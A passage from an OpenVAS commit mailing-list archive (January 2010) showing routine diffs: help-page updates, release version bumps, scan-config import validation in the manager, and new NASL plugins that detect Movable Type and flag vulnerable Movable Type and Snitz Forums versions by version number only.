          • OpenVAS Change Request #23: OpenVAS-libnasl: Standardize Script Families for NVT (done)
          • OpenVAS Change Request #24: OpenVAS-Server: Reorganize NVTs in Subdirectories (in progress)
          • OpenVAS Change Request #25: OpenVAS-libnasl: Introducing support for WMI (done)
          • OpenVAS Change Request #26: OpenVAS-libnasl: Introduction of more phases in NASL (in discussion) From scm-commit at wald.intevation.org Wed Jan 6 13:22:32 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 6 Jan 2010 13:22:32 +0100 (CET) Subject: [Openvas-commits] r6327 - in trunk/gsa: . src/html/src src/html/src/help Message-ID: <20100106122232.E501686607AF@pyrosoma.intevation.org> Author: felix Date: 2010-01-06 13:22:21 +0100 (Wed, 06 Jan 2010) New Revision: 6327 Modified: trunk/gsa/ChangeLog trunk/gsa/src/html/src/help/configure_scanconfigs.htm4 trunk/gsa/src/html/src/omp.xsl Log: * src/html/src/help/configure_scanconfigs.htm4: Added help text about import and export scan configs, removed text about importing openvasrc. * src/html/src/omp.xsl: Link to new help section. Modified: trunk/gsa/ChangeLog =================================================================== --- trunk/gsa/ChangeLog 2010-01-06 11:53:38 UTC (rev 6326) +++ trunk/gsa/ChangeLog 2010-01-06 12:22:21 UTC (rev 6327) @@ -1,5 +1,12 @@ 2010-01-06 Felix Wolfsteller + * src/html/src/help/configure_scanconfigs.htm4: Added help text about + import and export scan configs, removed text about importing openvasrc. + + * src/html/src/omp.xsl: Link to new help section. + +2010-01-06 Felix Wolfsteller + Resolved compile issues on 64bit systems. * src/gsad.c (serve_post): Cast size_t to int (.* format expects Modified: trunk/gsa/src/html/src/help/configure_scanconfigs.htm4 =================================================================== --- trunk/gsa/src/html/src/help/configure_scanconfigs.htm4 2010-01-06 11:53:38 UTC (rev 6326) +++ trunk/gsa/src/html/src/help/configure_scanconfigs.htm4 2010-01-06 12:22:21 UTC (rev 6327) @@ -23,12 +23,6 @@ The list of scan configurations will be updated.

            -

            -Note on Import config file: a incorrect syntax inside this file -will not necessarily be warned. When applied for a scan, -only correct entries will be used and the rest will be ignored. -

            - @@ -55,14 +49,29 @@ - - + +
            Base yes ---A predefined base scan configuration or
            - an scope configuration file of OpenVAS-Client (openvasrc)            		Full and Fast
            - ~/.openvas/mytask/myscope/openvasrc
            - ~/.openvas/.Servers/myserver/mytask/openvasrc            		A predefined base scan configurationEmpty, static and fast
            + Full and Fast
            + +

            Import Scan Config

            + +

            +To import a scan configuration, select the configuration file and hit the +"Import Scan Config" to submit the scan configuration. +The list of scan configurations will be updated. +Note that if the name of the scan configuration already exists in your system, +a numeric suffix will be added to the name of the imported scan configuration. +

            + +

            +To create a file that can be imported (e.g. if you have multiple GSA running +on different machines), refer to the export action. +

            + +

            Scan Configs

            @@ -158,4 +167,17 @@ out Editing not possible.

            + +

            Export Scan Config XML

            + +

            +A Scan Config can be saved to file, e.g. for sharing or backup. +A click on the download icon Download +will let you download a file describing this scan config. +

            + +

            +The file can later be imported by chosing to Import a Scan Config. +

            + m4_include(`footer.m4') Modified: trunk/gsa/src/html/src/omp.xsl =================================================================== --- trunk/gsa/src/html/src/omp.xsl 2010-01-06 11:53:38 UTC (rev 6326) +++ trunk/gsa/src/html/src/omp.xsl 2010-01-06 12:22:21 UTC (rev 6327) @@ -2528,7 +2528,7 @@
            Import Scan Config - From scm-commit at wald.intevation.org Wed Jan 6 15:37:48 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 6 Jan 2010 15:37:48 +0100 (CET) Subject: [Openvas-commits] r6328 - trunk/winslad Message-ID: <20100106143748.5781786607DC@pyrosoma.intevation.org> Author: mwiegand Date: 2010-01-06 15:37:47 +0100 (Wed, 06 Jan 2010) New Revision: 6328 Modified: trunk/winslad/CHANGES trunk/winslad/ChangeLog trunk/winslad/Makefile trunk/winslad/VERSION Log: Preparing for the 0.6.0 release. * CHANGES: Updated. * VERSION: Set to 0.6.0. * Makefile: Adjusted VERSION. Modified: trunk/winslad/CHANGES =================================================================== --- trunk/winslad/CHANGES 2010-01-06 12:22:21 UTC (rev 6327) +++ trunk/winslad/CHANGES 2010-01-06 14:37:47 UTC (rev 6328) @@ -1,3 +1,11 @@ +WinSLAD 0.6.0 (2010-01-06) + +This is the initial public release of the Windows Security Local Auditing +Daemon (WinSLAD). + +It now includes the ClamAV plugin. + + WinSLAD 0.5.0 (2009-11-27) This is the initial public release of the Windows Security Local Auditing Modified: trunk/winslad/ChangeLog =================================================================== --- trunk/winslad/ChangeLog 2010-01-06 12:22:21 UTC (rev 6327) +++ trunk/winslad/ChangeLog 2010-01-06 14:37:47 UTC (rev 6328) @@ -1,3 +1,13 @@ +2010-01-06 Michael Wiegand + + Preparing for the 0.6.0 release. + + * CHANGES: Updated. + + * VERSION: Set to 0.6.0. + + * Makefile: Adjusted VERSION. + 2010-01-05 Michael Wiegand * winslad.nsi: Make sure prerequisites for clamav are set up correctly. Modified: trunk/winslad/Makefile =================================================================== --- trunk/winslad/Makefile 2010-01-06 12:22:21 UTC (rev 6327) +++ trunk/winslad/Makefile 2010-01-06 14:37:47 UTC (rev 6328) @@ -1,6 +1,6 @@ # This is a GNU Makefile and part of Microsoft Windows SLAD -VERSION=0.5.1.SVN +VERSION=0.6.0 EXE=sladd.exe INSTALLER=winslad-installer.exe OBJ=main.o xml.o client.o path.o readn.o writen.o Modified: trunk/winslad/VERSION =================================================================== --- trunk/winslad/VERSION 2010-01-06 12:22:21 UTC (rev 6327) +++ trunk/winslad/VERSION 2010-01-06 14:37:47 UTC (rev 6328) @@ -1 +1 @@ -0.5.1.SVN +0.6.0 From scm-commit at wald.intevation.org Wed Jan 6 15:40:52 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 6 Jan 2010 15:40:52 +0100 (CET) Subject: [Openvas-commits] r6329 - tags Message-ID: <20100106144052.8210686607AF@pyrosoma.intevation.org> Author: mwiegand Date: 2010-01-06 15:40:52 +0100 (Wed, 06 Jan 2010) New Revision: 6329 Added: tags/winslad-release-0.6.0/ Log: Tagging winslad 0.6.0 release. Copied: tags/winslad-release-0.6.0 (from rev 6328, trunk/winslad) From scm-commit at wald.intevation.org Wed Jan 6 15:42:48 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 6 Jan 2010 15:42:48 +0100 (CET) Subject: [Openvas-commits] r6330 - trunk/winslad Message-ID: <20100106144248.A4E4786607DC@pyrosoma.intevation.org> Author: mwiegand Date: 2010-01-06 15:42:48 +0100 (Wed, 06 Jan 2010) New Revision: 6330 Modified: trunk/winslad/ChangeLog trunk/winslad/Makefile trunk/winslad/VERSION Log: Post release version bump. * VERSION: Set to 0.6.1.SVN. * Makefile: Adjusted VERSION. Modified: trunk/winslad/ChangeLog =================================================================== --- trunk/winslad/ChangeLog 2010-01-06 14:40:52 UTC (rev 6329) +++ trunk/winslad/ChangeLog 2010-01-06 14:42:48 UTC (rev 6330) @@ -1,5 +1,13 @@ 2010-01-06 Michael Wiegand + Post release version bump. + + * VERSION: Set to 0.6.1.SVN. + + * Makefile: Adjusted VERSION. + +2010-01-06 Michael Wiegand + Preparing for the 0.6.0 release. * CHANGES: Updated. Modified: trunk/winslad/Makefile =================================================================== --- trunk/winslad/Makefile 2010-01-06 14:40:52 UTC (rev 6329) +++ trunk/winslad/Makefile 2010-01-06 14:42:48 UTC (rev 6330) @@ -1,6 +1,6 @@ # This is a GNU Makefile and part of Microsoft Windows SLAD -VERSION=0.6.0 +VERSION=0.6.1.SVN EXE=sladd.exe INSTALLER=winslad-installer.exe OBJ=main.o xml.o client.o path.o readn.o writen.o Modified: trunk/winslad/VERSION =================================================================== --- trunk/winslad/VERSION 2010-01-06 14:40:52 UTC (rev 6329) +++ trunk/winslad/VERSION 2010-01-06 14:42:48 UTC (rev 6330) @@ -1 +1 @@ -0.6.0 +0.6.1.SVN From scm-commit at wald.intevation.org Wed Jan 6 17:08:35 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 6 Jan 2010 17:08:35 +0100 (CET) Subject: [Openvas-commits] r6331 - in trunk/openvas-manager: . src Message-ID: <20100106160835.552388667D1D@pyrosoma.intevation.org> Author: mattm Date: 2010-01-06 17:08:33 +0100 (Wed, 06 Jan 2010) New Revision: 6331 Modified: trunk/openvas-manager/ChangeLog trunk/openvas-manager/src/tasks_sql.h Log: * src/tasks_sql.h (insert_nvt_selectors): Set the family column when inserting the NVTs. Improve checking of types of given selectors. Modified: trunk/openvas-manager/ChangeLog =================================================================== --- trunk/openvas-manager/ChangeLog 2010-01-06 14:42:48 UTC (rev 6330) +++ trunk/openvas-manager/ChangeLog 2010-01-06 16:08:33 UTC (rev 6331) @@ -1,5 +1,10 @@ 2010-01-06 Matthew Mundell + * src/tasks_sql.h (insert_nvt_selectors): Set the family column when + inserting the NVTs. Improve checking of types of given selectors. + +2010-01-06 Matthew Mundell + * src/tasks_sql.h (create_config): Add name return arg. Find a unique name if a config with the same name exists already. Modified: trunk/openvas-manager/src/tasks_sql.h =================================================================== --- trunk/openvas-manager/src/tasks_sql.h 2010-01-06 14:42:48 UTC (rev 6330) +++ trunk/openvas-manager/src/tasks_sql.h 2010-01-06 16:08:33 UTC (rev 6331) @@ -6073,27 +6073,106 @@ if (selectors == NULL) return -3; while ((selector = (nvt_selector_t*) g_ptr_array_index (selectors, index++))) { + int type; + if (selector->type == NULL) return -3; - if (selector->family_or_nvt) + /** @todo Check that selector->type is actually an integer. */ + type = atoi (selector->type); + + if ((selector->family_or_nvt != NULL) + && (type == NVT_SELECTOR_TYPE_NVT)) { - char *quoted_family_or_nvt = sql_quote (selector->family_or_nvt); - sql ("INSERT into nvt_selectors (name, exclude, type, family_or_nvt)" - " VALUES ('%s', %i, %i, '%s');", + gchar *quoted_family_or_nvt, *quoted_family, *family = NULL; + nvti_t *nvti = nvtis_lookup (nvti_cache, selector->family_or_nvt); + + /* An NVT selector. */ + + if (nvti) + { + family = nvti_family (nvti); + + if (family == NULL) + { + g_warning ("%s: skipping NVT '%s' from import of config '%s'" + " because the NVT is missing a family in the" + " cache", + __FUNCTION__, + selector->family_or_nvt, + quoted_name); + continue; + } + } + else + { + g_warning ("%s: skipping NVT '%s' from import of config '%s'" + " because the NVT is missing from the cache", + __FUNCTION__, + selector->family_or_nvt, + quoted_name); + continue; + } + + quoted_family_or_nvt = sql_quote (selector->family_or_nvt); + quoted_family = sql_quote (family); + sql ("INSERT into nvt_selectors (name, exclude, type, family_or_nvt," + " family)" + " VALUES ('%s', %i, %i, '%s', '%s');", quoted_name, selector->include ? 0 : 1, - /** @todo Check this is in range. */ - atoi (selector->type), + type, + quoted_family_or_nvt, + quoted_family); + g_free (quoted_family_or_nvt); + g_free (quoted_family); + } + else if (selector->family_or_nvt) + { + gchar *quoted_family_or_nvt; + + /* A family selector. */ + + if (type != NVT_SELECTOR_TYPE_FAMILY) + { + g_warning ("%s: skipping NVT '%s' from import of config '%s'" + " because the type is wrong (expected family)", + __FUNCTION__, + selector->family_or_nvt, + quoted_name); + continue; + } + + quoted_family_or_nvt = sql_quote (selector->family_or_nvt); + + sql ("INSERT into nvt_selectors (name, exclude, type, family_or_nvt," + " family)" + " VALUES ('%s', %i, %i, '%s', NULL);", + quoted_name, + selector->include ? 0 : 1, + type, quoted_family_or_nvt); g_free (quoted_family_or_nvt); } else - sql ("INSERT into nvt_selectors (name, exclude, type, family_or_nvt)" - " VALUES ('%s', %i, %i, NULL);", - quoted_name, - selector->include ? 0 : 1, - /** @todo Check this is in range. */ - atoi (selector->type)); + { + /* An "all" selector. */ + + if (type != NVT_SELECTOR_TYPE_ALL) + { + g_warning ("%s: skipping NVT from import of config '%s'" + " because the type is wrong (expected all)", + __FUNCTION__, + quoted_name); + continue; + } + + sql ("INSERT into nvt_selectors (name, exclude, type, family_or_nvt," + " family)" + " VALUES ('%s', %i, %i, NULL, NULL);", + quoted_name, + selector->include ? 0 : 1, + type); + } } return 0; } From scm-commit at wald.intevation.org Wed Jan 6 18:07:57 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 6 Jan 2010 18:07:57 +0100 (CET) Subject: [Openvas-commits] r6332 - in trunk/openvas-plugins: . scripts Message-ID: <20100106170757.EFB1F8667D1D@pyrosoma.intevation.org> Author: mime Date: 2010-01-06 18:07:55 +0100 (Wed, 06 Jan 2010) New Revision: 6332 Added: trunk/openvas-plugins/scripts/mt_37638.nasl trunk/openvas-plugins/scripts/mt_detect.nasl trunk/openvas-plugins/scripts/snitz_forums_2000_37637.nasl Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/cve_current.txt trunk/openvas-plugins/scripts/webmirror.nasl Log: Added new plugins Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2010-01-06 16:08:33 UTC (rev 6331) +++ trunk/openvas-plugins/ChangeLog 2010-01-06 17:07:55 UTC (rev 6332) @@ -1,5 +1,15 @@ 2010-01-06 Michael Meyer + * scripts/mt_detect.nasl, + scripts/snitz_forums_2000_37637.nasl, + scripts/mt_37638.nasl: + Added new plugins. + + * scripts/webmirror.nasl: + Small Fix. + +2010-01-06 Michael Meyer + * scripts/centreon_37383.nasl, scripts/centreon_detect.nasl: Added new plugins. Modified: trunk/openvas-plugins/cve_current.txt =================================================================== --- trunk/openvas-plugins/cve_current.txt 2010-01-06 16:08:33 UTC (rev 6331) +++ trunk/openvas-plugins/cve_current.txt 2010-01-06 17:07:55 UTC (rev 6332) @@ -469,3 +469,5 @@ 37605 Greenbone svn R 37515 Greenbone svn R 37383 Greenbone svn R +37637 Greenbone svn R +37638 Greenbone svn R Added: trunk/openvas-plugins/scripts/mt_37638.nasl =================================================================== --- trunk/openvas-plugins/scripts/mt_37638.nasl 2010-01-06 16:08:33 UTC (rev 6331) +++ trunk/openvas-plugins/scripts/mt_37638.nasl 2010-01-06 17:07:55 UTC (rev 6332) @@ -0,0 +1,92 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Movable Type Unspecified Security Bypass Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100430); + script_bugtraq_id(37638); + script_version ("1.0-$Revision$"); + + script_name("Movable Type Unspecified Security Bypass Vulnerability"); + +desc = "Overview: +Movable Type is prone to an unspecified security-bypass vulnerability. + +Very little is known about this issue at this time (06.01.2010). We will update +this BID as more information emerges. + +This issue affects versions prior to 4.27 and 5.01. + +Solution: +The vendor has released fixes. Please see the references for more +information. + +References: +http://www.securityfocus.com/bid/37638 +http://www.movabletype.jp/blog/movable_type_501.html +http://www.movabletype.org/ +http://jvn.jp/en/jp/JVN09872874/index.html + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if Movable Type version is < 4.27 or < 5.01"); + script_category(ACT_GATHER_INFO); + script_family("Web application abuses"); + script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH"); + script_dependencies("mt_detect.nasl"); + script_require_ports("Services/www", 80); + script_exclude_keys("Settings/disable_cgi_scanning"); + exit(0); +} + +include("http_func.inc"); +include("http_keepalive.inc"); +include("version_func.inc"); + +port = get_http_port(default:80); +if(!get_port_state(port))exit(0); + +if(!version = get_kb_item(string("www/", port, "/movabletype")))exit(0); +if(!matches = eregmatch(string:version, pattern:"^(.+) under (/.*)$"))exit(0); + +vers = matches[1]; + +if(!isnull(vers) && vers >!< "unknown") { + + if(vers =~ "^5\.") { + if(version_is_less(version: vers, test_version: "5.01")) { + security_warning(port:port); + exit(0); + } + } + else if(version_is_less(version: vers, test_version: "4.27")) { + security_warning(port:port); + exit(0); + } +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/mt_37638.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/mt_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/mt_detect.nasl 2010-01-06 16:08:33 UTC (rev 6331) +++ trunk/openvas-plugins/scripts/mt_detect.nasl 2010-01-06 17:07:55 UTC (rev 6332) @@ -0,0 +1,113 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Movable Type Detection +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +# need desc here to modify it later in script. +desc = "Overview: +This host is running Movable Type. Movable Type makes it simple to +manage entire websites, start new blogs, and build an engaged +community of readers and customers. + +See also: +http://www.movabletype.com + +Risk factor : None"; + +if (description) +{ + script_id(100429); + script_version ("1.0-$Revision$"); + + script_name("Movable Type Detection"); + script_description(desc); + script_summary("Checks for the presence of Movable Type"); + script_category(ACT_GATHER_INFO); + script_family("Service detection"); + script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH"); + script_dependencies("find_service.nes", "http_version.nasl"); + script_require_ports("Services/www", 80); + script_exclude_keys("Settings/disable_cgi_scanning"); + exit(0); +} + + +include("http_func.inc"); +include("http_keepalive.inc"); +include("global_settings.inc"); + +port = get_http_port(default:80); + +if(!get_port_state(port))exit(0); + +dirs = make_list("/mt","/cgi-bin/mt",cgi_dirs()); + +foreach dir (dirs) { + + url = string(dir, "/mt.cgi"); + req = http_get(item:url, port:port); + buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE); + if( buf == NULL )continue; + + if(egrep(pattern: "Movable Type", string: buf, icase: TRUE) && "Six Apart" >< buf) + { + if(strlen(dir)>0) { + install=dir; + } else { + install=string("/"); + } + + vers = string("unknown"); + ### try to get version + version = eregmatch(string: buf, pattern: "Version ([0-9.]+)",icase:TRUE); + + if ( !isnull(version[1]) ) { + vers=chomp(version[1]); + set_kb_item(name: string("cpe:/a:sixapart:movable_type:",vers), value: TRUE); + } else { + set_kb_item(name: string("cpe:/a:sixapart:movable_type"), value: TRUE); + } + + set_kb_item(name: string("www/", port, "/movabletype"), value: string(vers," under ",install)); + + info = string("None\n\nMovable Type Version '"); + info += string(vers); + info += string("' was detected on the remote host in the following directory(s):\n\n"); + info += string(install, "\n"); + + desc = ereg_replace( + string:desc, + pattern:"None$", + replace:info + ); + + if(report_verbosity > 0) { + security_note(port:port,data:desc); + } + exit(0); + + } +} +exit(0); + Property changes on: trunk/openvas-plugins/scripts/mt_detect.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/snitz_forums_2000_37637.nasl =================================================================== --- trunk/openvas-plugins/scripts/snitz_forums_2000_37637.nasl 2010-01-06 16:08:33 UTC (rev 6331) +++ trunk/openvas-plugins/scripts/snitz_forums_2000_37637.nasl 2010-01-06 17:07:55 UTC (rev 6332) @@ -0,0 +1,87 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Snitz Forums 2000 'X-Forwarded-For' SQL Injection Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100431); + script_bugtraq_id(37637); + script_version ("1.0-$Revision$"); + + script_name("Snitz Forums 2000 'X-Forwarded-For' SQL Injection Vulnerability"); + +desc = "Overview: +Snitz Forums 2000 is prone to an SQL-injection vulnerability because +it fails to sufficiently sanitize user-supplied data before using it +in an SQL query. + +Exploiting this issue could allow an attacker to compromise the +application, access or modify data, or exploit latent vulnerabilities +in the underlying database. + +Snitz Forums 2000 3.4.07 is vulnerable; other versions may also +be affected. + +References: +http://www.securityfocus.com/bid/37637 +http://forum.snitz.com/ + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if Snitz Forums 2000 version is 3.4.07"); + script_category(ACT_GATHER_INFO); + script_family("Web application abuses"); + script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH"); + script_dependencies("snitz_forums_2000_detect.nasl"); + script_require_ports("Services/www", 80); + script_exclude_keys("Settings/disable_cgi_scanning"); + exit(0); +} + +include("http_func.inc"); +include("version_func.inc"); + +port = get_http_port(default:80); +if(!get_port_state(port))exit(0); + +if (!can_host_asp(port:port)) exit(0); + +if(!version = get_kb_item(string("www/", port, "/SnitzForums")))exit(0); +if(!matches = eregmatch(string:version, pattern:"^(.+) under (/.*)$"))exit(0); + +vers = matches[1]; + +if(!isnull(vers) && vers >!< "unknown") { + + if(version_is_equal(version: vers, test_version: "3.4.07")) { + security_warning(port:port); + exit(0); + } + +} + +exit(0); + Property changes on: trunk/openvas-plugins/scripts/snitz_forums_2000_37637.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Modified: trunk/openvas-plugins/scripts/webmirror.nasl =================================================================== --- trunk/openvas-plugins/scripts/webmirror.nasl 2010-01-06 16:08:33 UTC (rev 6331) +++ trunk/openvas-plugins/scripts/webmirror.nasl 2010-01-06 17:07:55 UTC (rev 6332) @@ -874,7 +874,8 @@ function parse_refresh(elements, current) { local_var href, content, t, sub; - + + if(elements["content"] == '0')return NULL; content = elements["content"]; if(!content) From scm-commit at wald.intevation.org Thu Jan 7 08:25:55 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 7 Jan 2010 08:25:55 +0100 (CET) Subject: [Openvas-commits] r6333 - trunk/doc/website Message-ID: <20100107072555.BF90B86607B2@pyrosoma.intevation.org> Author: felix Date: 2010-01-07 08:25:54 +0100 (Thu, 07 Jan 2010) New Revision: 6333 Modified: trunk/doc/website/openvas-cr-9.htm4 trunk/doc/website/openvas-crs.htm4 Log: Marked CR #9 as done Modified: trunk/doc/website/openvas-cr-9.htm4 =================================================================== --- trunk/doc/website/openvas-cr-9.htm4 2010-01-06 17:07:55 UTC (rev 6332) +++ trunk/doc/website/openvas-cr-9.htm4 2010-01-07 07:25:54 UTC (rev 6333) @@ -28,8 +28,7 @@ PAGE_START <h2>OpenVAS Change Request #9: Make OpenVAS use (and depend on) glib</h2> -Status: Voted +2. In progress; command line parsing in openvas-server and openvas-libnasl -has already been migrated to glib starting with 2.0-beta1. +Status: Voted +2. Done. Increasing use of glib and dependency since release of 2.0 series. <h3>Purpose</h3> @@ -137,6 +136,8 @@ <h3>History</h3> <ul> +<li> 2010-01-07 Felix Wolfsteller <felix.wolfsteller at intevation.de>:<br> + Updated status as done.</li> <li> 2008-10-21 Michael Wiegand <michael.wiegand at intevation.de>:<br> Updated status.</li> <li> 2008-06-18 Jan-Oliver Wagner <jan-oliver.wagner at intevation.de>:<br> Modified: trunk/doc/website/openvas-crs.htm4 =================================================================== --- trunk/doc/website/openvas-crs.htm4 2010-01-06 17:07:55 UTC (rev 6332) +++ trunk/doc/website/openvas-crs.htm4 2010-01-07 07:25:54 UTC (rev 6333) @@ -52,7 +52,7 @@ <li> <a href="openvas-cr-6.html">OpenVAS Change Request #6: Remove support of old XML report format</a> (done) <li> <a href="openvas-cr-7.html">OpenVAS Change Request #7: Extend report widget with optional info on NVT name/oid in OpenVAS-Client</a> (done) <li> <a href="openvas-cr-8.html">OpenVAS Change Request #8: Introduce NVT family "Credentials"</a> (done) -<li> <a href="openvas-cr-9.html">OpenVAS Change Request #9: Make OpenVAS use (and depend on) glib</a> (in progress) +<li> <a href="openvas-cr-9.html">OpenVAS Change Request #9: Make OpenVAS use (and depend on) glib</a> (done) <li> <a href="openvas-cr-10.html">OpenVAS Change Request #10: Remove support for non-SSL connections in OpenVAS-Client</a> (done) <li> <a href="openvas-cr-11.html">OpenVAS Change Request #11: Make OpenVAS-Client use (and depend on) glib</a> (done) <li> <a href="openvas-cr-12.html">OpenVAS Change Request #12: Replace NTP with OTP</a> (done) From scm-commit at wald.intevation.org Thu Jan 7 09:31:36 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 7 Jan 2010 09:31:36 +0100 (CET) Subject: [Openvas-commits] r6334 - in trunk/openvas-libraries: . hg Message-ID: <20100107083136.A392186607B3@pyrosoma.intevation.org> Author: felix Date: 2010-01-07 09:31:35 +0100 (Thu, 07 Jan 2010) New Revision: 6334 Modified: trunk/openvas-libraries/ChangeLog trunk/openvas-libraries/configure.in trunk/openvas-libraries/hg/Makefile trunk/openvas-libraries/hg/hosts_gatherer.c trunk/openvas-libraries/hg/hosts_gatherer.h trunk/openvas-libraries/hg/test.c Log: * configure.in: Added comments. * hg/host_gatherer.c, hg/host_gatherer.h: Formatting. * hg/Makefile: Adjusted linker flags for the host gatherer test program. * hg/test.c: Formatted, added missing includes. Modified: trunk/openvas-libraries/ChangeLog =================================================================== --- trunk/openvas-libraries/ChangeLog 2010-01-07 07:25:54 UTC (rev 6333) +++ trunk/openvas-libraries/ChangeLog 2010-01-07 08:31:35 UTC (rev 6334) @@ -1,3 +1,14 @@ +2010-01-07 Felix Wolfsteller <felix.wolfsteller at intevation.de> + + * configure.in: Added comments. + + * hg/host_gatherer.c, hg/host_gatherer.h: Formatting. + + * hg/Makefile: Adjusted linker flags for the host gatherer test + program. + + * hg/test.c: Formatted, added missing includes. + 2009-12-30 Matthew Mundell <matthew.mundell at intevation.de> * omp/omp.c (omp_create_lsc_credential): Add login arg for updated OMP. Modified: trunk/openvas-libraries/configure.in =================================================================== --- trunk/openvas-libraries/configure.in 2010-01-07 07:25:54 UTC (rev 6333) +++ trunk/openvas-libraries/configure.in 2010-01-07 08:31:35 UTC (rev 6334) @@ -171,9 +171,11 @@ [AC_CHECK_LIB(resolv, __dn_expand, LIBS="-lresolv $LIBS", AC_MSG_ERROR(you need to install resolve library with development files))]) +dnl Check for GNUTLS AC_CHECK_LIB(gnutls, gnutls_init, LIBS="-lgnutls $LIBS", AC_MSG_ERROR(you need to install gnutls library with development files)) +dnl Check for libpcap AC_CHECK_LIB(pcap, pcap_version, LIBS="-lpcap $LIBS", AC_MSG_ERROR(you need to install pcap library with development files)) Modified: trunk/openvas-libraries/hg/Makefile =================================================================== --- trunk/openvas-libraries/hg/Makefile 2010-01-07 07:25:54 UTC (rev 6333) +++ trunk/openvas-libraries/hg/Makefile 2010-01-07 08:31:35 UTC (rev 6334) @@ -36,7 +36,7 @@ all : libopenvas_hg.la test : libopenvas_hg.la test.c - $(CC) $(DEFS) $(include) $(CFLAGS) -Wall -I../misc test.c -o test -L.libs -lopenvas_hg $(LIBS) + $(CC) $(DEFS) $(include) $(CFLAGS) -Wall -I../misc test.c -o test -L.libs -lopenvas_base -lopenvas_misc -lopenvas_hg $(LIBS) install : libopenvas_hg.la test -d $(DESTDIR)${libdir} || $(INSTALL_DIR) -m 755 $(DESTDIR)${libdir} Modified: trunk/openvas-libraries/hg/hosts_gatherer.c =================================================================== --- trunk/openvas-libraries/hg/hosts_gatherer.c 2010-01-07 07:25:54 UTC (rev 6333) +++ trunk/openvas-libraries/hg/hosts_gatherer.c 2010-01-07 08:31:35 UTC (rev 6334) @@ -15,7 +15,6 @@ * You should have received a copy of the GNU Library General Public * License along with this library; if not, write to the Free * Software Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. - * */ /** @@ -35,26 +34,26 @@ #include "hg_dns_axfr.h" -int hg_test_syntax(char * hostname, int flags) +int +hg_test_syntax (char * hostname, int flags) { struct hg_globals * globals = malloc(sizeof(struct hg_globals)); int err; - + hostname = strdup(hostname); bzero(globals, sizeof(struct hg_globals)); globals->flags = flags; globals->host_list = malloc(sizeof(struct hg_host)); bzero(globals->host_list, sizeof(struct hg_host)); - + globals->tested = malloc(sizeof(struct hg_host)); bzero(globals->tested, sizeof(struct hg_host)); - + globals->input = strdup(hostname); globals->marker = globals->input; - + globals->distribute = 0; - err = hg_add_comma_delimited_hosts(globals, 0); free(hostname); hg_cleanup(globals); @@ -64,11 +63,11 @@ /** * Inits a hg_globals struct with hostname and flags. - * + * * @return Fresh hg_globals. */ -struct hg_globals * -hg_init( char* hostname, int flags) +struct hg_globals * +hg_init (char* hostname, int flags) { struct hg_globals * globals = malloc(sizeof(struct hg_globals)); @@ -77,27 +76,26 @@ globals->flags = flags; globals->host_list = malloc(sizeof(struct hg_host)); bzero(globals->host_list, sizeof(struct hg_host)); - + globals->tested = malloc(sizeof(struct hg_host)); bzero(globals->tested, sizeof(struct hg_host)); - + globals->input = strdup(hostname); globals->marker = globals->input; - + globals->distribute = 0; - hg_add_comma_delimited_hosts(globals, 256); free(hostname); return(globals); } -int hg_next_host(struct hg_globals * globals, struct 